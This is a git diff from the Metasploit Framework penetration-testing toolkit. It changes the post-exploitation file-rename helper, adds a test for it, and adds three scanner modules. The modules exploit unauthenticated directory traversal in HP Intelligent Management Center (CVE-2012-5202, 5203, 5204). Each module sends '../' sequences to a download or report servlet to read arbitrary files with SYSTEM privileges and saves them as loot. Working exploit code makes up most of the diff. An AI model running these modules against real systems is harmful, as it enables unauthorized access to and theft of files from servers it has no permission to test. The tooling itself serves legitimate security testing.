diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index 47a0677c1c..1ed5dd6b34 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb @@ -299,13 +299,18 @@ module Msf::Post::File end # - # Rename a remote file. This is a stopgap until a proper API version is added: - # http://dev.metasploit.com/redmine/issues/7288 + # Rename a remote file. # - def rename_file(new_file, old_file) - #TODO: this is not ideal as the file contents are sent to meterp server and back to the client - write_file(new_file, read_file(old_file)) - rm_f(old_file) + def rename_file(old_file, new_file) + if session.respond_to? :commands and session.commands.include?("stdapi_fs_file_move") + session.fs.file.mv(old_file, new_file) + else + if session.platform =~ /win/ + cmd_exec(%Q|move /y "#{old_file}" "#{new_file}"|) + else + cmd_exec(%Q|mv -f "#{old_file}" "#{new_file}"|) + end + end end alias :move_file :rename_file alias :mv_file :rename_file diff --git a/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb new file mode 100644 index 0000000000..21f5443227 --- /dev/null +++ b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb @@ -0,0 +1,104 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP Intelligent Management FaultDownloadServlet Directory Traversal', + 'Description' => %q{ + This module exploits a lack of authentication and a directory traversal in HP + Intelligent Management, specifically in the FaultDownloadServlet, in order to + retrieve arbitrary files with SYSTEM privileges. This module has been tested + successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rgod ', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-5202' ], + [ 'OSVDB', '91027' ], + [ 'BID', '58675' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-051/' ] + ] + )) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']), + OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']), + # By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\ + OptInt.new('DEPTH', [true, 'Traversal depth', 7]) + ], self.class) + end + + def is_imc? + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"), + 'method' => 'GET' + }) + + if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/ + return true + else + return false + end + end + + def my_basename(filename) + return ::File.basename(filename.gsub(/\\/, "/")) + end + + def run_host(ip) + + if not is_imc? + vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center") + return + end + + travs = "" + travs << "../" * datastore['DEPTH'] + travs << datastore['FILEPATH'] + + vprint_status("#{rhost}:#{rport} - Sending request...") + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "tmp", "fault", "download"), + 'method' => 'GET', + 'vars_get' => + { + 'fileName' => travs + } + }) + + if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc" + contents = res.body + fname = my_basename(datastore['FILEPATH']) + path = store_loot( + 'hp.imc.faultdownloadservlet', + 'application/octet-stream', + ip, + contents, + fname + ) + print_good("#{rhost}:#{rport} - File saved in: #{path}") + else + vprint_error("#{rhost}:#{rport} - Failed to retrieve file") + return + end + end +end diff --git a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb new file mode 100644 index 0000000000..1e308b45d4 --- /dev/null +++ b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb @@ -0,0 +1,104 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP Intelligent Management IctDownloadServlet Directory Traversal', + 'Description' => %q{ + This module exploits a lack of authentication and a directory traversal in HP + Intelligent Management, specifically in the IctDownloadServlet, in order to + retrieve arbitrary files with SYSTEM privileges. This module has been tested + successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rgod ', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-5204' ], + [ 'OSVDB', '91029' ], + [ 'BID', '58676' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-053/' ] + ] + )) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']), + OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']), + # By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\ + OptInt.new('DEPTH', [true, 'Traversal depth', 7]) + ], self.class) + end + + def is_imc? + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"), + 'method' => 'GET' + }) + + if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/ + return true + else + return false + end + end + + def my_basename(filename) + return ::File.basename(filename.gsub(/\\/, "/")) + end + + def run_host(ip) + + if not is_imc? + vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center") + return + end + + travs = "" + travs << "../" * datastore['DEPTH'] + travs << datastore['FILEPATH'] + + vprint_status("#{rhost}:#{rport} - Sending request...") + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "tmp", "ict", "download"), + 'method' => 'GET', + 'vars_get' => + { + 'fileName' => travs + } + }) + + if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc" + contents = res.body + fname = my_basename(datastore['FILEPATH']) + path = store_loot( + 'hp.imc.faultdownloadservlet', + 'application/octet-stream', + ip, + contents, + fname + ) + print_good("#{rhost}:#{rport} - File saved in: #{path}") + else + vprint_error("#{rhost}:#{rport} - Failed to retrieve file") + return + end + end +end diff --git a/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb new file mode 100644 index 0000000000..bfe035cb38 --- /dev/null +++ b/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb @@ -0,0 +1,104 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP Intelligent Management ReportImgServlt Directory Traversal', + 'Description' => %q{ + This module exploits a lack of authentication and a directory traversal in HP + Intelligent Management, specifically in the ReportImgServlt, in order to retrieve + arbitrary files with SYSTEM privileges. This module has been tested successfully on + HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rgod ', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-5203' ], + [ 'OSVDB', '91028' ], + [ 'BID', '58672' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-052/' ] + ] + )) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']), + OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']), + # By default files downloaded from C:\Program Files\iMC\client\bin\ + OptInt.new('DEPTH', [true, 'Traversal depth', 4]) + ], self.class) + end + + def is_imc? + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"), + 'method' => 'GET' + }) + + if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/ + return true + else + return false + end + end + + def my_basename(filename) + return ::File.basename(filename.gsub(/\\/, "/")) + end + + def run_host(ip) + + if not is_imc? + vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center") + return + end + + travs = "" + travs << "../" * datastore['DEPTH'] + travs << datastore['FILEPATH'] + + vprint_status("#{rhost}:#{rport} - Sending request...") + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "reportImg"), + 'method' => 'GET', + 'vars_get' => + { + 'path' => travs + } + }) + + if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "image/png" + contents = res.body + fname = my_basename(datastore['FILEPATH']) + path = store_loot( + 'hp.imc.faultdownloadservlet', + 'application/octet-stream', + ip, + contents, + fname + ) + print_good("#{rhost}:#{rport} - File saved in: #{path}") + else + vprint_error("#{rhost}:#{rport} - Failed to retrieve file") + return + end + end +end diff --git a/test/modules/post/test/file.rb b/test/modules/post/test/file.rb index 924cf91a4c..ea301d86be 100644 --- a/test/modules/post/test/file.rb +++ b/test/modules/post/test/file.rb @@ -13,11 +13,10 @@ class Metasploit4 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Testing remote file manipulation', + 'Name' => 'Testing Remote File Manipulation', 'Description' => %q{ This module will test Post::File API methods }, 'License' => MSF_LICENSE, 'Author' => [ 'egypt'], - 'Version' => '$Revision$', 'Platform' => [ 'windows', 'linux', 'java' ], 'SessionTypes' => [ 'meterpreter', 'shell' ] )) @@ -102,6 +101,23 @@ class Metasploit4 < Msf::Post not file_exist?("pwned") end + it "should move files" do + # Make sure we don't have leftovers from a previous run + file_rm("meterpreter-test") rescue nil + file_rm("meterpreter-test-moved") rescue nil + + # touch a new file + write_file("meterpreter-test", "") + + rename_file("meterpreter-test", "meterpreter-test-moved") + res &&= exist?("meterpreter-test-moved") + res &&= !exist?("meterpreter-test") + + # clean up + file_rm("meterpreter-test") rescue nil + file_rm("meterpreter-test-moved") rescue nil + end + end def test_binary_files